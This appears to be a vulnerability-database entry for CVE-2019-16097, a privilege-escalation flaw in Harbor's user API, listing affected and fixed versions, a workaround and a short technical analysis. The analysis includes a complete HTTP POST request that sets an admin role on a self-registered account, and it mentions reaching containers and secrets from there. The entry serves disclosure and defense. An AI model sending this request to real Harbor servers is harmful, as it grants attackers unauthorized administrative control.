Attacker Value
Very High
(1 user assessed)
Exploitability
Low
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
0

CVE-2019-16097

Disclosure Date: September 08, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.

Add Assessment

1
Ratings
Technical Analysis

There are three specific requirements for an application to be vulnerable:

  • Vulnerable version !
  • Using a Database for storage
  • Self Registration enabled.

Self-registration is not a very common setting but it has been seen.

If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.

POST /api/users HTTP/1.1
Host: 10.102.7.190
Content-Type: application/json
Content-Length: 95
Connection: close


{"username":"Tom","email":"Tom@demo.local","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}

If you have access to the repository as an admin you can manipulate the containers and even gain further access in to the network if you can read and or modify any of the cotanienrs or their secrets.

General Information

Technical Analysis